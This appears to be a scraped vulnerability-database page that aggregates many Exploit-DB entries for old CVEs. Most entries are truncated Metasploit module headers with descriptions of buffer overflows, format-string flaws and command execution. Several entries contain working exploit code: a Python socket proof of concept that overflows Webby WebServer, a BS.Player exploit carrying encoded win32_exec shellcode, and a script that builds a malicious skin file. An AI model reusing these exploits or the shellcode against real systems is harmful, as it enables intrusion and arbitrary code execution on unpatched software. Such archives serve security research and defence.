released prior to Windows XP SP1 (2000 SP4, XP SP0). Despite Microsoft's claim
that this vulnerability can be exploited without authentication, the N
Exploit-DB
BolinTech DreamFTP Server 1.02 - Format String (Metasploit)
exploitdb·2010-06-22
CVE-2004-2074 BolinTech DreamFTP Server 1.02 - Format String (Metasploit)
BolinTech DreamFTP Server 1.02 - Format String (Metasploit)
---
##
# $Id: dreamftp_format.rb 9583 2010-06-22 19:11:05Z todb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'BolinTech Dream FTP Server 1.02 Format String',
'Description' => %q{
This module exploits a format string overflow in the BolinTech
Dream FTP Server version 1.02. Based on the exploit by SkyLined.
},
'Author' => [ 'Patrick Webster ' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9583 $',
'References' =>
[
[ 'CVE', '2004-2074'],
[ 'OSVDB',
Exploit-DB
Netcat 1.10 - NT Stack Buffer Overflow (Metasploit)
exploitdb·2010-06-22
CVE-2004-1317 Netcat 1.10 - NT Stack Buffer Overflow (Metasploit)
Netcat 1.10 - NT Stack Buffer Overflow (Metasploit)
---
##
# $Id: netcat110_nt.rb 9587 2010-06-22 23:57:05Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Netcat v1.10 NT Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Netcat v1.10 NT. By sending
an overly long string we are able to overwrite SEH. The vulnerability
exists when netcat is used to bind (-e) an executable to a port in doexec.c.
This module tested successfully using "c:\>nc -L -p 31337 -e ftp".
},
'Author' => 'patrick',
'Arc
Exploit-DB
Webiz 2004 - Local File Upload
exploitdb·2010-05-29
Webiz 2004 - Local File Upload
Webiz 2004 - Local File Upload
---
# Exploit Title: (Webiz) local SHELL Upload Vulnerability
# Date: 23-05-2010
# Author: kannibal615
# Software Link: N/A
# Version: 2004
# Tested on: PHP
# CVE : N/A
# Code :
@@ @@ @@@@@@ @@ @@ @@@@ @@@@@@@ @@ @@ @@@@@@@ @@@@@
@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@
@@ @@ @@ @@@ @@@@@@@@ @@ @@ @@ @@@@ @@@@@@ @@ @@
@@ @@ @@ @@@ @@@@@@@@ @@@@@@@@ @@ @@ @@ @@@@@@ @@ @@
@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@
@@ @@@@@@ @@ @@ @@ @@ @@@@@@@ @@ @@ @@@@@@@ @@ @@ dot NET
KANNIBAL615
WEBIZ REMOTE SHELL UPLOAD VULNERABILITY
BY
KANNIBAL615
== Found By : kannibal615
== website : www.vbhacker.net/vb
== email : zn[at]live[dot]de
==
== Thanks to : THE PIRATOR
== : Pc-InSeCt / emptyzero
== : DAK / l3G3NDS / m0j4h3d
== : V!Ru$_T4ckJ3n / __MiM0__
== : ruqa / PrideA
Exploit-DB
Webby WebServer - Overflow (SEH) (PoC)
exploitdb·2010-05-25
CVE-2010-2102 Webby WebServer - Overflow (SEH) (PoC)
Webby WebServer - Overflow (SEH) (PoC)
---
#!/usr/bin/python
##POC details:
##
##SEH overwritten
##
##contact: [email protected]
## http://www.s3cur1ty.de
##App detail:
##
#http://www.shareware.de/webby-webserver/
#Version 1.01
#Autor Timo Gaik
#Lizenzart Freeware
#Plattformen Win XP, Win 98, Win ME
#Letztes Update 19.10.2004
#Dateigroesse 701 KB
import socket
import sys
import os.path
import time
if len(sys.argv) "
sys.exit(0)
ips = sys.argv[1]
port = int(sys.argv[2])
string = "A"*790
string += "\x90"*4
string += "\x42"*105
method = "GET"
print "starting POC for:", ips
print ""
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
connect=s.connect((ips, port))
except:
print "no connection possible"
sys.exit(1)
payload = method + ' http://'+ ips + '/' + string + ' HTTP/1.0\x0d\x0a
Exploit-DB
Medal of Honor Allied Assault - getinfo Stack Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2004-0735 Medal of Honor Allied Assault - getinfo Stack Buffer Overflow (Metasploit)
Medal of Honor Allied Assault - getinfo Stack Buffer Overflow (Metasploit)
---
##
# $Id: mohaa_getinfo.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Medal Of Honor Allied Assault getinfo Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in the getinfo
command of Medal Of Honor Allied Assault.
},
'Author' => [ 'Jacopo Cervini' ],
'License' => BSD_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2004-0735'],
[ 'OSVDB', '8061' ],
[ 'URL',
Exploit-DB
PSOProxy 0.91 - Stack Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2004-0313 PSOProxy 0.91 - Stack Buffer Overflow (Metasploit)
PSOProxy 0.91 - Stack Buffer Overflow (Metasploit)
---
##
# $Id: psoproxy91_overflow.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'PSO Proxy v0.91 Stack Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the PSO Proxy v0.91 web server.
If a client sends an excessively long string the stack is overwritten.
},
'Author' => 'Patrick Webster ',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2004-0313' ],
[ 'OSVDB', '4028' ],
[ 'URL', 'http://www.milw0rm.co
Exploit-DB
MiniShare 1.4.1 - Remote Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2004-2271 MiniShare 1.4.1 - Remote Buffer Overflow (Metasploit)
MiniShare 1.4.1 - Remote Buffer Overflow (Metasploit)
---
##
# $Id: minishare_get_overflow.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Minishare 1.4.1 Buffer Overflow',
'Description' => %q{
This is a simple buffer overflow for the minishare web
server. This flaw affects all versions prior to 1.4.2. This
is a plain stack buffer overflow that requires a "jmp esp" to reach
the payload, making this difficult to target many platforms
at once. This module has been successfully tested against
1.4.1. Version
Exploit-DB
Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2007-1689 Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow (Metasploit)
Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: nis2004_get.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the ISAlertDataCOM ActiveX
Control (ISLAert.dll) provided by Symantec Norton Internet Security 2004.
By sending a overly long string to the "Get()" method, an attacker may be
able to execute arbitrary code.
Exploit-DB
Norton AntiSpam 2004 - SymSpamHelper ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2004-0363 Norton AntiSpam 2004 - SymSpamHelper ActiveX Control Buffer Overflow (Metasploit)
Norton AntiSpam 2004 - SymSpamHelper ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: nis2004_antispam.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Norton AntiSpam 2004. When
sending an overly long string to the LaunchCustomRuleWizard() method
of symspam.dll (2004.1.0.147) an attacker may be able to execute
arbitrary code.
},
'License' => MSF_LICENSE,
'Aut
Exploit-DB
Mercury/32 Mail Server 4.01a - IMAP RENAME Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2004-1211 Mercury/32 Mail Server 4.01a - IMAP RENAME Buffer Overflow (Metasploit)
Mercury/32 Mail Server 4.01a - IMAP RENAME Buffer Overflow (Metasploit)
---
##
# $Id: mercury_rename.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Mercury/32 v4.01a IMAP RENAME Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow vulnerability in the
Mercury/32 v.4.01a IMAP service.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2004-1211'],
[ 'OSVDB', '12508'],
[ 'BID', '11775'],
[ 'NSS', '15867'],
],
'Pri
Exploit-DB
Squid - NTLM (Authenticated) Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2004-0541 Squid - NTLM (Authenticated) Overflow (Metasploit)
Squid - NTLM (Authenticated) Overflow (Metasploit)
---
##
# $Id: squid_ntlm_authenticate.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Squid NTLM Authenticate Overflow',
'Description' => %q{
This is an exploit for Squid\'s NTLM authenticate overflow
(libntlmssp.c). Due to improper bounds checking in
ntlm_check_auth, it is possible to overflow the 'pass'
variable on the stack with user controlled data of a user
defined length. Props to iDEFENSE for the advisory.
},
'Author' => 'skape',
'Version' => '$
Exploit-DB
Berlios GPSD - Format String (Metasploit)
exploitdb·2010-04-30
CVE-2004-1388 Berlios GPSD - Format String (Metasploit)
Berlios GPSD - Format String (Metasploit)
---
##
# $Id: gpsd_format_string.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Berlios GPSD Format String Vulnerability',
'Description' => %q{
This module exploits a format string vulnerability in the Berlios GPSD server.
This vulnerability was discovered by Kevin Finisterre.
},
'Author' => [ 'Yann Senotier ' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2004-1388' ],
[ 'OSVDB', '13199' ],
[ 'BID', '12371' ],
[ 'URL'
Exploit-DB
Icecast 2.0.1 (Windows x86) - Header Overwrite (Metasploit)
exploitdb·2010-04-30
CVE-2004-1561 Icecast 2.0.1 (Windows x86) - Header Overwrite (Metasploit)
Icecast 2.0.1 (Windows x86) - Header Overwrite (Metasploit)
---
##
# $Id: icecast_header.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Icecast ( %q{
This module exploits a buffer overflow in the header parsing
of icecast, discovered by Luigi Auriemma. Sending 32 HTTP
headers will cause a write one past the end of a pointer
array. On win32 this happens to overwrite the saved
instruction pointer, and on linux (depending on compiler,
etc) this seems to generally overwrite nothing crucial (read
not exploit
Exploit-DB
IPSwitch IMail LDAP Daemon/Service - Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2004-0297 IPSwitch IMail LDAP Daemon/Service - Remote Buffer Overflow (Metasploit)
IPSwitch IMail LDAP Daemon/Service - Remote Buffer Overflow (Metasploit)
---
##
# $Id: imail_thc.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'IMail LDAP Service Buffer Overflow',
'Description' => %q{
This exploits a buffer overflow in the LDAP service that is
part of the IMail product. This module was tested against
version 7.10 and 8.5, both running on Windows 2000.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2004-0297'],
[ 'OSVDB'
Exploit-DB
BS.Player 2.51 - Universal Overflow (SEH)
exploitdb·2010-01-16
CVE-2010-2004 BS.Player 2.51 - Universal Overflow (SEH)
BS.Player 2.51 - Universal Overflow (SEH)
---
# Exploit Title: BS.Player v2.51 Universal SEH Overflow Exploit
# Date: 15/01/2010
# Author: Dz_attacker
# Version: 2.51
# Tested on: Windows xp sp3
# Code :
# Discover : mertsarica
# Exploit : Dz_Attacker ([email protected])
junk = "[Options]\nSkin="
# win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
payload =(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x30\x42\x30\x42\x50\x4b\x38\x45\x54\x4e\x33\x4b
Exploit-DB
BS.Player 2.51 - Overwrite (SEH)
exploitdb·2010-01-15
CVE-2010-2004 BS.Player 2.51 - Overwrite (SEH)
BS.Player 2.51 - Overwrite (SEH)
---
# BS.Player v2.51
# Software Link: http://www.bsplayer.com/bsplayer-english/download-free.html
# SEH Overwrite Vulnerability
# http://www.mertsarica.com
junk = "[Options]\nSkin="
vulnerability = junk + "\x41"*496 + "\x42"*4 + "\x43"*4
try:
vulnerable = open("vulnerable.bsi",'w')
vulnerable.write(vulnerability)
vulnerable.close()
print "Vulnerable file created!\n"
except:
print "Error occured!"
Exploit-DB
MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit)
exploitdb·2005-08-12
CVE-2004-1520 MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit)
MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit)
---
##
# $Id: mdaemon_cram_md5.rb 9583 2010-06-22 19:11:05Z todb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow',
'Description' => %q{
This module exploits a buffer overflow in the CRAM-MD5
authentication of the MDaemon IMAP service. This
vulnerability was discovered by Muts.
},
'Author' => [ 'anonymous' ],
'License' => BSD_LICENSE,
'Version' => '$Revision: 9583 $',
'References' =>
[
[ 'CVE', '2004-1520'],
[ 'OSVDB', '
Exploit-DB
Veritas NetBackup - Remote Command Execution (Metasploit)
exploitdb·2004-10-21
CVE-2004-1389 Veritas NetBackup - Remote Command Execution (Metasploit)
Veritas NetBackup - Remote Command Execution (Metasploit)
---
##
# $Id: veritas_netbackup_cmdexec.rb 10617 2010-10-09 06:55:52Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'VERITAS NetBackup Remote Command Execution',
'Description' => %q{
This module allows arbitrary command execution on an
ephemeral port opened by Veritas NetBackup, whilst an
administrator is authenticated. The port is opened and
allows direct console access as root or SYSTEM from
any source address.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Versi
Exploit-DB
DistCC Daemon - Command Execution (Metasploit)
exploitdb·2002-02-01
CVE-2004-2687 DistCC Daemon - Command Execution (Metasploit)
DistCC Daemon - Command Execution (Metasploit)
---
##
# $Id: distcc_exec.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'DistCC Daemon Command Execution',
'Description' => %q{
This module uses a documented security weakness to execute
arbitrary commands on any system running distccd.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9669 $',
'References' =>
[
[ 'CVE', '2004-2687'],
[ 'OSVDB', '13378' ],
[ 'URL', 'http://distcc.samba.org/security.html'],
],
'Platform' => ['u
No writeups or analysis indexed.
http://secunia.com/advisories/38221http://www.exploit-db.com/exploits/11154http://www.mertsarica.com/?p=511http://www.mertsarica.com/codes/bsplayer_seh_overwrite.pyhttp://www.securityfocus.com/bid/37831http://www.vupen.com/english/advisories/2010/0148https://exchange.xforce.ibmcloud.com/vulnerabilities/55708http://secunia.com/advisories/38221http://www.exploit-db.com/exploits/11154http://www.mertsarica.com/?p=511http://www.mertsarica.com/codes/bsplayer_seh_overwrite.pyhttp://www.securityfocus.com/bid/37831http://www.vupen.com/english/advisories/2010/0148https://exchange.xforce.ibmcloud.com/vulnerabilities/55708
2010-05-20
Published